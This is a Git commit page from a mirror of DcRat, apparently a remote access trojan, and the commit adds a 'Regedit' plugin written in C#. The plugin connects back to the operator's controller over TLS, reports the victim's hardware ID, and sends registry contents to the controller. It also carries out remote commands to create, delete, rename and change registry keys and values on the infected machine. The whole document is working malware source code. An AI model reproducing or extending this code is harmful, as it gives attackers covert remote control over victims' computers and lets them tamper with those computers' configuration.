qwqdanchun
/
DcRat
mirror of https://github.com/qwqdanchun/DcRat.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

1

This commit is contained in:
qwqdanchun 2021-04-16 17:22:34 +08:00
parent 137e43215b
commit 5b44718df4
34 changed files with 3021 additions and 455 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
DcRat.sln
View File

@ -49,6 +49,8 @@ Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Keylogger", "Plugin\Keylogg
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Netstat", "Plugin\Netstat\Netstat\Netstat.csproj", "{EFFE3048-E904-48FD-B8C0-290E8E9290FB}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Regedit", "Plugin\Regedit\Regedit\Regedit.csproj", "{AB6CDF36-F336-4F14-8D69-3C190B7DEC65}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
@ -233,6 +235,14 @@ Global
{EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Release|Any CPU.Build.0 = Release|Any CPU
{EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Release|x86.ActiveCfg = Release|Any CPU
{EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Release|x86.Build.0 = Release|Any CPU
{AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Debug|Any CPU.Build.0 = Debug|Any CPU
{AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Debug|x86.ActiveCfg = Debug|Any CPU
{AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Debug|x86.Build.0 = Debug|Any CPU
{AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Release|Any CPU.ActiveCfg = Release|Any CPU
{AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Release|Any CPU.Build.0 = Release|Any CPU
{AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Release|x86.ActiveCfg = Release|Any CPU
{AB6CDF36-F336-4F14-8D69-3C190B7DEC65}.Release|x86.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
@ -257,6 +267,7 @@ Global
{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{5D01A326-0357-4C3F-A196-3B8B866C9613} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{EFFE3048-E904-48FD-B8C0-290E8E9290FB} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{AB6CDF36-F336-4F14-8D69-3C190B7DEC65} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {1C926148-C492-48B3-8F82-7EBB235A9866}

25
Plugin/Regedit/Regedit.sln Normal file
View File

@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.29123.88
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Regedit", "Regedit\Regedit.csproj", "{1092ea5e-0249-4a81-a957-5bc44182128c}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{1092ea5e-0249-4a81-a957-5bc44182128c}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{1092ea5e-0249-4a81-a957-5bc44182128c}.Debug|Any CPU.Build.0 = Debug|Any CPU
{1092ea5e-0249-4a81-a957-5bc44182128c}.Release|Any CPU.ActiveCfg = Release|Any CPU
{1092ea5e-0249-4a81-a957-5bc44182128c}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {4FD410CC-1F1D-4948-A108-13285D633CDD}
EndGlobalSection
EndGlobal

227
Plugin/Regedit/Regedit/Connection.cs Normal file
View File

@ -0,0 +1,227 @@
using Plugin.Handler;
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public static class Connection
{
public static Socket TcpClient { get; set; }
public static SslStream SslClient { get; set; }
public static X509Certificate2 ServerCertificate { get; set; }
private static byte[] Buffer { get; set; }
private static long HeaderSize { get; set; }
private static long Offset { get; set; }
private static Timer Tick { get; set; }
public static bool IsConnected { get; set; }
private static object SendSync { get; } = new object();
public static string Hwid { get; set; }
public static void InitializeClient(byte[] packet)
{
try
{
TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
{
ReceiveBufferSize = 50 * 1024,
SendBufferSize = 50 * 1024,
};
TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
if (TcpClient.Connected)
{
Debug.WriteLine("Plugin Connected!");
IsConnected = true;
SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
new Thread(() =>
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Pac_ket").AsString = "regManager";
msgpack.ForcePathObject("Hwid").AsString = Hwid;
msgpack.ForcePathObject("Command").AsString = "setClient";
Send(msgpack.Encode2Bytes());
new RegManager(new MsgPack()).LoadKey(msgpack.ForcePathObject("RootKeyName").AsString);
}).Start();
}
else
{
IsConnected = false;
return;
}
}
catch
{
Debug.WriteLine("Disconnected!");
IsConnected = false;
return;
}
}
private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
#if DEBUG
return true;
#endif
return ServerCertificate.Equals(certificate);
}
public static void Disconnected()
{
try
{
IsConnected = false;
Tick?.Dispose();
SslClient?.Dispose();
TcpClient?.Dispose();
GC.Collect();
}
catch { }
}
public static void ReadServertData(IAsyncResult ar) //Socket read/recevie
{
try
{
if (!TcpClient.Connected || !IsConnected)
{
IsConnected = false;
return;
}
int recevied = SslClient.EndRead(ar);
if (recevied > 0)
{
Offset += recevied;
HeaderSize -= recevied;
if (HeaderSize == 0)
{
HeaderSize = BitConverter.ToInt32(Buffer, 0);
Debug.WriteLine("/// Plugin Buffersize " + HeaderSize.ToString() + " Bytes ///");
if (HeaderSize > 0)
{
Offset = 0;
Buffer = new byte[HeaderSize];
while (HeaderSize > 0)
{
int rc = SslClient.Read(Buffer, (int)Offset, (int)HeaderSize);
if (rc <= 0)
{
IsConnected = false;
return;
}
Offset += rc;
HeaderSize -= rc;
if (HeaderSize < 0)
{
IsConnected = false;
return;
}
}
Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
thread.Start(Buffer);
Offset = 0;
HeaderSize = 4;
Buffer = new byte[HeaderSize];
}
else
{
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
}
}
else if (HeaderSize < 0)
{
IsConnected = false;
return;
}
SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null);
}
else
{
IsConnected = false;
return;
}
}
catch
{
IsConnected = false;
return;
}
}
public static void Send(byte[] msg)
{
lock (SendSync)
{
try
{
if (!IsConnected || msg == null)
{
return;
}
byte[] buffersize = BitConverter.GetBytes(msg.Length);
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(buffersize, 0, buffersize.Length);
if (msg.Length > 1000000) //1mb
{
Debug.WriteLine("send chunks");
using (MemoryStream memoryStream = new MemoryStream(msg))
{
int read = 0;
memoryStream.Position = 0;
byte[] chunk = new byte[50 * 1000];
while ((read = memoryStream.Read(chunk, 0, chunk.Length)) > 0)
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(chunk, 0, read);
}
}
}
else
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(msg, 0, msg.Length);
SslClient.Flush();
}
Debug.WriteLine("Plugin Packet Sent");
}
catch
{
IsConnected = false;
return;
}
}
}
public static void CheckServer(object obj)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Pac_ket").AsString = "Ping!)";
Send(msgpack.Encode2Bytes());
GC.Collect();
}
}
}

135
Plugin/Regedit/Regedit/Handler/ByteConverter.cs Normal file
View File

@ -0,0 +1,135 @@
using System;
using System.Collections.Generic;
using System.Text;
namespace Plugin.Handler
{
public class ByteConverter
{
private static byte NULL_BYTE = byte.MinValue;
public static byte[] GetBytes(int value)
{
return BitConverter.GetBytes(value);
}
public static byte[] GetBytes(long value)
{
return BitConverter.GetBytes(value);
}
public static byte[] GetBytes(uint value)
{
return BitConverter.GetBytes(value);
}
public static byte[] GetBytes(ulong value)
{
return BitConverter.GetBytes(value);
}
public static byte[] GetBytes(string value)
{
return StringToBytes(value);
}
public static byte[] GetBytes(string[] value)
{
return StringArrayToBytes(value);
}
public static int ToInt32(byte[] bytes)
{
return BitConverter.ToInt32(bytes, 0);
}
public static long ToInt64(byte[] bytes)
{
return BitConverter.ToInt64(bytes, 0);
}
public static uint ToUInt32(byte[] bytes)
{
return BitConverter.ToUInt32(bytes, 0);
}
public static ulong ToUInt64(byte[] bytes)
{
return BitConverter.ToUInt64(bytes, 0);
}
public static string ToString(byte[] bytes)
{
return BytesToString(bytes);
}
public static string[] ToStringArray(byte[] bytes)
{
return BytesToStringArray(bytes);
}
private static byte[] GetNullBytes()
{
//Null bytes: 00 00
return new byte[] { NULL_BYTE, NULL_BYTE };
}
private static byte[] StringToBytes(string value)
{
byte[] bytes = new byte[value.Length * sizeof(char)];
Buffer.BlockCopy(value.ToCharArray(), 0, bytes, 0, bytes.Length);
return bytes;
}
private static byte[] StringArrayToBytes(string[] strings)
{
List<byte> bytes = new List<byte>();
foreach(string str in strings)
{
bytes.AddRange(StringToBytes(str));
bytes.AddRange(GetNullBytes());
}
return bytes.ToArray();
}
private static string BytesToString(byte[] bytes)
{
int nrChars = (int)Math.Ceiling((float)bytes.Length / (float)sizeof(char));
char[] chars = new char[nrChars];
Buffer.BlockCopy(bytes, 0, chars, 0, bytes.Length);
return new string(chars);
}
private static string[] BytesToStringArray(byte[] bytes)
{
List<string> strings = new List<string>();
int i = 0;
StringBuilder strBuilder = new StringBuilder(bytes.Length);
while (i < bytes.Length)
{
//Holds the number of nulls (3 nulls indicated end of a string)
int nullcount = 0;
while (i < bytes.Length && nullcount < 3)
{
if (bytes[i] == NULL_BYTE)
{
nullcount++;
}
else
{
strBuilder.Append(Convert.ToChar(bytes[i]));
nullcount = 0;
}
i++;
}
strings.Add(strBuilder.ToString());
strBuilder.Clear();
}
return strings.ToArray();
}
}
}

255
Plugin/Regedit/Regedit/Handler/RegManager.cs Normal file
View File

@ -0,0 +1,255 @@
using System;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Text;
using System.Diagnostics;
using System.Threading;
using MessagePackLib.MessagePack;
using System.Runtime.InteropServices;
using Microsoft.Win32;
using System.Text.RegularExpressions;
using System.Runtime.Serialization.Formatters.Binary;
using static Plugin.Handler.RegistrySeeker;
namespace Plugin.Handler
{
public class RegManager
{
public RegManager(MsgPack unpack_msgpack)
{
try
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
case "LoadRegistryKey":
{
string RootKeyName = unpack_msgpack.ForcePathObject("RootKeyName").AsString;
LoadKey(RootKeyName);
break;
}
case "CreateRegistryKey":
{
string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString;
CreateKey(ParentPath);
break;
}
case "DeleteRegistryKey":
{
string KeyName = unpack_msgpack.ForcePathObject("KeyName").AsString;
string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString;
DeleteKey(KeyName, ParentPath);
break;
}
case "RenameRegistryKey":
{
string OldKeyName = unpack_msgpack.ForcePathObject("OldKeyName").AsString;
string NewKeyName = unpack_msgpack.ForcePathObject("NewKeyName").AsString;
string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString;
RenameKey(OldKeyName, NewKeyName, ParentPath);
break;
}
case "CreateRegistryValue":
{
string KeyPath = unpack_msgpack.ForcePathObject("KeyPath").AsString;
string Kindstring = unpack_msgpack.ForcePathObject("Kindstring").AsString;
CreateValue(KeyPath, Kindstring);
break;
}
case "DeleteRegistryValue":
{
string KeyPath = unpack_msgpack.ForcePathObject("KeyPath").AsString;
string ValueName = unpack_msgpack.ForcePathObject("ValueName").AsString;
DeleteValue(KeyPath, ValueName);
break;
}
case "RenameRegistryValue":
{
string OldValueName = unpack_msgpack.ForcePathObject("OldValueName").AsString;
string NewValueName = unpack_msgpack.ForcePathObject("NewValueName").AsString;
string KeyPath = unpack_msgpack.ForcePathObject("KeyPath").AsString;
RenameValue(OldValueName, NewValueName, KeyPath);
break;
}
case "ChangeRegistryValue":
{
byte[] Valuebyte = unpack_msgpack.ForcePathObject("Value").GetAsBytes();
BinaryFormatter formatter = new BinaryFormatter();
MemoryStream mStream = new MemoryStream();
mStream.Write(Valuebyte, 0, Valuebyte.Length);
mStream.Flush();
mStream.Seek(0, SeekOrigin.Begin);
RegValueData Value = (RegValueData)formatter.Deserialize(mStream);
ChangeValue(Value, unpack_msgpack.ForcePathObject("KeyPath").AsString);
break;
}
}
}
catch (Exception ex)
{
Debug.WriteLine(ex.Message);
Packet.Error(ex.Message);
}
}
public void LoadKey(string RootKeyName)
{
try
{
RegistrySeeker seeker = new RegistrySeeker();
seeker.BeginSeeking(RootKeyName);
BinaryFormatter formatter = new BinaryFormatter();
MemoryStream mStream = new MemoryStream();
formatter.Serialize(mStream, seeker.Matches);
mStream.Flush();
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Pac_ket").AsString = "regManager";
msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Command").AsString = "LoadKey";
msgpack.ForcePathObject("RootKey").AsString = RootKeyName;
msgpack.ForcePathObject("Matches").SetAsBytes(mStream.GetBuffer());
Connection.Send(msgpack.Encode2Bytes());
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
public void CreateKey(string ParentPath)
{
string errorMsg;
string newKeyName = "";
try
{
RegistryEditor.CreateRegistryKey(ParentPath, out newKeyName, out errorMsg);
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
public void DeleteKey(string KeyName, string ParentPath)
{
string errorMsg;
try
{
RegistryEditor.DeleteRegistryKey(KeyName, ParentPath, out errorMsg);
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
public void RenameKey(string OldKeyName, string NewKeyName, string ParentPath)
{
string errorMsg;
try
{
RegistryEditor.RenameRegistryKey(OldKeyName, NewKeyName, ParentPath, out errorMsg);
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
public void CreateValue(string KeyPath, string Kindstring)
{
string errorMsg;
string newKeyName = "";
RegistryValueKind Kind = RegistryValueKind.None;
switch (Kindstring)
{
case "-1":
{
Kind = RegistryValueKind.None;
break;
}
case "0":
{
Kind = RegistryValueKind.Unknown;
break;
}
case "1":
{
Kind = RegistryValueKind.String;
break;
}
case "2":
{
Kind = RegistryValueKind.ExpandString;
break;
}
case "3":
{
Kind = RegistryValueKind.Binary;
break;
}
case "4":
{
Kind = RegistryValueKind.DWord;
break;
}
case "7":
{
Kind = RegistryValueKind.MultiString;
break;
}
case "11":
{
Kind = RegistryValueKind.QWord;
break;
}
}
try
{
RegistryEditor.CreateRegistryValue(KeyPath, Kind, out newKeyName, out errorMsg);
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
public void DeleteValue(string KeyPath,string ValueName)
{
string errorMsg;
try
{
RegistryEditor.DeleteRegistryValue(KeyPath, ValueName, out errorMsg);
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
public void RenameValue(string OldValueName, string NewValueName, string KeyPath)
{
string errorMsg;
try
{
RegistryEditor.RenameRegistryValue(OldValueName, NewValueName, KeyPath, out errorMsg);
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
public void ChangeValue(RegValueData Value, string KeyPath)
{
string errorMsg;
try
{
RegistryEditor.ChangeRegistryValue(Value, KeyPath, out errorMsg);
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
}
}

397
Plugin/Regedit/Regedit/Handler/RegistryEditor.cs Normal file
View File

@ -0,0 +1,397 @@
using Microsoft.Win32;
using System;
using static Plugin.Handler.RegistrySeeker;
namespace Plugin.Handler
{
public class RegistryEditor
{
private const string REGISTRY_KEY_CREATE_ERROR = "Cannot create key: Error writing to the registry";
private const string REGISTRY_KEY_DELETE_ERROR = "Cannot delete key: Error writing to the registry";
private const string REGISTRY_KEY_RENAME_ERROR = "Cannot rename key: Error writing to the registry";
private const string REGISTRY_VALUE_CREATE_ERROR = "Cannot create value: Error writing to the registry";
private const string REGISTRY_VALUE_DELETE_ERROR = "Cannot delete value: Error writing to the registry";
private const string REGISTRY_VALUE_RENAME_ERROR = "Cannot rename value: Error writing to the registry";
private const string REGISTRY_VALUE_CHANGE_ERROR = "Cannot change value: Error writing to the registry";
/// <summary>
/// Attempts to create the desired sub key to the specified parent.
/// </summary>
/// <param name="parentPath">The path to the parent for which to create the sub-key on.</param>
/// <param name="name">output parameter that holds the name of the sub-key that was create.</param>
/// <param name="errorMsg">output parameter that contains possible error message.</param>
/// <returns>Returns true if action succeeded.</returns>
public static bool CreateRegistryKey(string parentPath, out string name, out string errorMsg)
{
name = "";
try
{
RegistryKey parent = GetWritableRegistryKey(parentPath);
//Invalid can not open parent
if (parent == null)
{
errorMsg = "You do not have write access to registry: " + parentPath + ", try running client as administrator";
return false;
}
//Try to find available names
int i = 1;
string testName = String.Format("New Key #{0}", i);
while (parent.ContainsSubKey(testName))
{
i++;
testName = String.Format("New Key #{0}", i);
}
name = testName;
using (RegistryKey child = parent.CreateSubKeySafe(name))
{
//Child could not be created
if (child == null)
{
errorMsg = REGISTRY_KEY_CREATE_ERROR;
return false;
}
}
//Child was successfully created
errorMsg = "";
return true;
}
catch (Exception ex)
{
errorMsg = ex.Message;
return false;
}
}
/// <summary>
/// Attempts to delete the desired sub-key from the specified parent.
/// </summary>
/// <param name="name">The name of the sub-key to delete.</param>
/// <param name="parentPath">The path to the parent for which to delete the sub-key on.</param>
/// <param name="errorMsg">output parameter that contains possible error message.</param>
/// <returns>Returns true if the operation succeeded.</returns>
public static bool DeleteRegistryKey(string name, string parentPath, out string errorMsg)
{
try
{
RegistryKey parent = GetWritableRegistryKey(parentPath);
//Invalid can not open parent
if (parent == null)
{
errorMsg = "You do not have write access to registry: " + parentPath + ", try running client as administrator";
return false;
}
//Child does not exist
if (!parent.ContainsSubKey(name))
{
errorMsg = "The registry: " + name + " does not exist in: " + parentPath;
//If child does not exists then the action has already succeeded
return true;
}
bool success = parent.DeleteSubKeyTreeSafe(name);
//Child could not be deleted
if (!success)
{
errorMsg = REGISTRY_KEY_DELETE_ERROR;
return false;
}
//Child was successfully deleted
errorMsg = "";
return true;
}
catch (Exception ex)
{
errorMsg = ex.Message;
return false;
}
}
/// <summary>
/// Attempts to rename the desired key.
/// </summary>
/// <param name="oldName">The name of the key to rename.</param>
/// <param name="newName">The name to use for renaming.</param>
/// <param name="parentPath">The path of the parent for which to rename the key.</param>
/// <param name="errorMsg">output parameter that contains possible error message.</param>
/// <returns>Returns true if the operation succeeded.</returns>
public static bool RenameRegistryKey(string oldName, string newName, string parentPath, out string errorMsg)
{
try
{
RegistryKey parent = GetWritableRegistryKey(parentPath);
//Invalid can not open parent
if (parent == null)
{
errorMsg = "You do not have write access to registry: " + parentPath + ", try running client as administrator";
return false;
}
//Child does not exist
if (!parent.ContainsSubKey(oldName))
{
errorMsg = "The registry: " + oldName + " does not exist in: " + parentPath;
return false;
}
bool success = parent.RenameSubKeySafe(oldName, newName);
//Child could not be renamed
if (!success)
{
errorMsg = REGISTRY_KEY_RENAME_ERROR;
return false;
}
//Child was successfully renamed
errorMsg = "";
return true;
}
catch (Exception ex)
{
errorMsg = ex.Message;
return false;
}
}
/// <summary>
/// Attempts to create the desired value for the specified parent.
/// </summary>
/// <param name="keyPath">The path to the key for which to create the registry value on.</param>
/// <param name="kind">The type of the registry value to create.</param>
/// <param name="name">output parameter that holds the name of the registry value that was create.</param>
/// <param name="errorMsg">output parameter that contains possible error message.</param>
/// <returns>Returns true if the operation succeeded.</returns>
public static bool CreateRegistryValue(string keyPath, RegistryValueKind kind, out string name, out string errorMsg)
{
name = "";
try
{
RegistryKey key = GetWritableRegistryKey(keyPath);
//Invalid can not open key
if (key == null)
{
errorMsg = "You do not have write access to registry: " + keyPath + ", try running client as administrator";
return false;
}
//Try to find available names
int i = 1;
string testName = String.Format("New Value #{0}", i);
while (key.ContainsValue(testName))
{
i++;
testName = String.Format("New Value #{0}", i);
}
name = testName;
bool success = key.SetValueSafe(name, kind.GetDefault(), kind);
//Value could not be created
if (!success)
{
errorMsg = REGISTRY_VALUE_CREATE_ERROR;
return false;
}
//Value was successfully created
errorMsg = "";
return true;
}
catch (Exception ex)
{
errorMsg = ex.Message;
return false;
}
}
/// <summary>
/// Attempts to delete the desired registry value from the specified key.
/// </summary>
/// <param name="keyPath">The path to the key for which to delete the registry value on.</param>
/// /// <param name="name">The name of the registry value to delete.</param>
/// <param name="errorMsg">output parameter that contains possible error message.</param>
/// <returns>Returns true if the operation succeeded.</returns>
public static bool DeleteRegistryValue(string keyPath, string name, out string errorMsg)
{
try
{
RegistryKey key = GetWritableRegistryKey(keyPath);
//Invalid can not open key
if (key == null)
{
errorMsg = "You do not have write access to registry: " + keyPath + ", try running client as administrator";
return false;
}
//Value does not exist
if (!key.ContainsValue(name))
{
errorMsg = "The value: " + name + " does not exist in: " + keyPath;
//If value does not exists then the action has already succeeded
return true;
}
bool success = key.DeleteValueSafe(name);
//Value could not be deleted
if (!success)
{
errorMsg = REGISTRY_VALUE_DELETE_ERROR;
return false;
}
//Value was successfully deleted
errorMsg = "";
return true;
}
catch (Exception ex)
{
errorMsg = ex.Message;
return false;
}
}
/// <summary>
/// Attempts to rename the desired registry value.
/// </summary>
/// <param name="oldName">The name of the registry value to rename.</param>
/// <param name="newName">The name to use for renaming.</param>
/// <param name="keyPath">The path of the key for which to rename the registry value.</param>
/// <param name="errorMsg">output parameter that contains possible error message.</param>
/// <returns>Returns true if the operation succeeded.</returns>
public static bool RenameRegistryValue(string oldName, string newName, string keyPath, out string errorMsg)
{
try
{
RegistryKey key = GetWritableRegistryKey(keyPath);
//Invalid can not open key
if (key == null)
{
errorMsg = "You do not have write access to registry: " + keyPath + ", try running client as administrator";
return false;
}
//Value does not exist
if (!key.ContainsValue(oldName))
{
errorMsg = "The value: " + oldName + " does not exist in: " + keyPath;
return false;
}
bool success = key.RenameValueSafe(oldName, newName);
//Value could not be renamed
if (!success)
{
errorMsg = REGISTRY_VALUE_RENAME_ERROR;
return false;
}
//Value was successfully renamed
errorMsg = "";
return true;
}
catch (Exception ex)
{
errorMsg = ex.Message;
return false;
}
}
/// <summary>
/// Attempts to change the value for the desired registry value for the
/// specified key.
/// </summary>
/// <param name="value">The registry value to change to in the form of a
/// RegValueData object.</param>
/// <param name="keyPath">The path to the key for which to change the
/// value of the registry value on.</param>
/// <param name="errorMsg">output parameter that contains possible error message.</param>
/// <returns>Returns true if the operation succeeded.</returns>
public static bool ChangeRegistryValue(RegValueData value, string keyPath, out string errorMsg)
{
try
{
RegistryKey key = GetWritableRegistryKey(keyPath);
//Invalid can not open key
if (key == null)
{
errorMsg = "You do not have write access to registry: " + keyPath + ", try running client as administrator";
return false;
}
//Is not default value and does not exist
if (!RegistryKeyHelper.IsDefaultValue(value.Name) && !key.ContainsValue(value.Name))
{
errorMsg = "The value: " + value.Name + " does not exist in: " + keyPath;
return false;
}
bool success = key.SetValueSafe(value.Name, value.Data, value.Kind);
//Value could not be created
if (!success)
{
errorMsg = REGISTRY_VALUE_CHANGE_ERROR;
return false;
}
//Value was successfully created
errorMsg = "";
return true;
}
catch (Exception ex)
{
errorMsg = ex.Message;
return false;
}
}
public static RegistryKey GetWritableRegistryKey(string keyPath)
{
RegistryKey key = RegistrySeeker.GetRootKey(keyPath);
if (key != null)
{
//Check if this is a root key or not
if (key.Name != keyPath)
{
//Must get the subKey name by removing root and '\\'
string subKeyName = keyPath.Substring(key.Name.Length + 1);
key = key.OpenWritableSubKeySafe(subKeyName);
}
}
return key;
}
}
}

399
Plugin/Regedit/Regedit/Handler/RegistryKeyExtensions.cs Normal file
View File

@ -0,0 +1,399 @@
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Linq;
namespace Plugin.Handler
{
/// <summary>
/// Provides extensions for registry key and value operations.
/// </summary>
public static class RegistryKeyExtensions
{
/// <summary>
/// Determines if the registry key by the name provided is null or has the value of null.
/// </summary>
/// <param name="keyName">The name associated with the registry key.</param>
/// <param name="key">The actual registry key.</param>
/// <returns>True if the provided name is null or empty, or the key is null; False if otherwise.</returns>
private static bool IsNameOrValueNull(this string keyName, RegistryKey key)
{
return (string.IsNullOrEmpty(keyName) || (key == null));
}
/// <summary>
/// Attempts to get the string value of the key using the specified key name. This method assumes
/// correct input.
/// </summary>
/// <param name="key">The key of which we obtain the value of.</param>
/// <param name="keyName">The name of the key.</param>
/// <param name="defaultValue">The default value if value can not be determined.</param>
/// <returns>Returns the value of the key using the specified key name. If unable to do so,
/// defaultValue will be returned instead.</returns>
public static string GetValueSafe(this RegistryKey key, string keyName, string defaultValue = "")
{
try
{
return key.GetValue(keyName, defaultValue).ToString();
}
catch
{
return defaultValue;
}
}
/// <summary>
/// Attempts to obtain a readonly (non-writable) sub key from the key provided using the
/// specified name. Exceptions thrown will be caught and will only return a null key.
/// This method assumes the caller will dispose of the key when done using it.
/// </summary>
/// <param name="key">The key of which the sub key is obtained from.</param>
/// <param name="name">The name of the sub-key.</param>
/// <returns>Returns the sub-key obtained from the key and name provided; Returns null if
/// unable to obtain a sub-key.</returns>
public static RegistryKey OpenReadonlySubKeySafe(this RegistryKey key, string name)
{
try
{
return key.OpenSubKey(name, false);
}
catch
{
return null;
}
}
/// <summary>
/// Attempts to obtain a writable sub key from the key provided using the specified
/// name. This method assumes the caller will dispose of the key when done using it.
/// </summary>
/// <param name="key">The key of which the sub key is obtained from.</param>
/// <param name="name">The name of the sub-key.</param>
/// <returns>Returns the sub-key obtained from the key and name provided; Returns null if
/// unable to obtain a sub-key.</returns>
public static RegistryKey OpenWritableSubKeySafe(this RegistryKey key, string name)
{
try
{
return key.OpenSubKey(name, true);
}
catch
{
return null;
}
}
/// <summary>
/// Attempts to create a sub key from the key provided using the specified
/// name. This method assumes the caller will dispose of the key when done using it.
/// </summary>
/// <param name="key">The key of which the sub key is to be created from.</param>
/// <param name="name">The name of the sub-key.</param>
/// <returns>Returns the sub-key that was created for the key and name provided; Returns null if
/// unable to create a sub-key.</returns>
public static RegistryKey CreateSubKeySafe(this RegistryKey key, string name)
{
try
{
return key.CreateSubKey(name);
}
catch
{
return null;
}
}
/// <summary>
/// Attempts to delete a sub-key and its children from the key provided using the specified
/// name.
/// </summary>
/// <param name="key">The key of which the sub-key is to be deleted from.</param>
/// <param name="name">The name of the sub-key.</param>
/// <returns>Returns <c>true</c> if the action succeeded, otherwise <c>false</c>.</returns>
public static bool DeleteSubKeyTreeSafe(this RegistryKey key, string name)
{
try
{
key.DeleteSubKeyTree(name, true);
return true;
}
catch
{
return false;
}
}
/*
* Derived and Adapted from drdandle's article,
* Copy and Rename Registry Keys at Code project.
* Copy and Rename Registry Keys (Post Date: November 11, 2006)
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* This is a work that is not of the original. It
* has been modified to suit the needs of another
* application.
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* First Modified by StingRaptor on January 21, 2016
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* Original Source:
* http://www.codeproject.com/Articles/16343/Copy-and-Rename-Registry-Keys
*/
/// <summary>
/// Attempts to rename a sub-key to the key provided using the specified old
/// name and new name.
/// </summary>
/// <param name="key">The key of which the subkey is to be renamed from.</param>
/// <param name="oldName">The old name of the sub-key.</param>
/// <param name="newName">The new name of the sub-key.</param>
/// <returns>Returns <c>true</c> if the action succeeded, otherwise <c>false</c>.</returns>
public static bool RenameSubKeySafe(this RegistryKey key, string oldName, string newName)
{
try
{
//Copy from old to new
key.CopyKey(oldName, newName);
//Dispose of the old key
key.DeleteSubKeyTree(oldName);
return true;
}
catch
{
//Try to dispose of the newKey (The rename failed)
key.DeleteSubKeyTreeSafe(newName);
return false;
}
}
/// <summary>
/// Attempts to copy a old subkey to a new subkey for the key
/// provided using the specified old name and new name. (throws exceptions)
/// </summary>
/// <param name="key">The key of which the subkey is to be deleted from.</param>
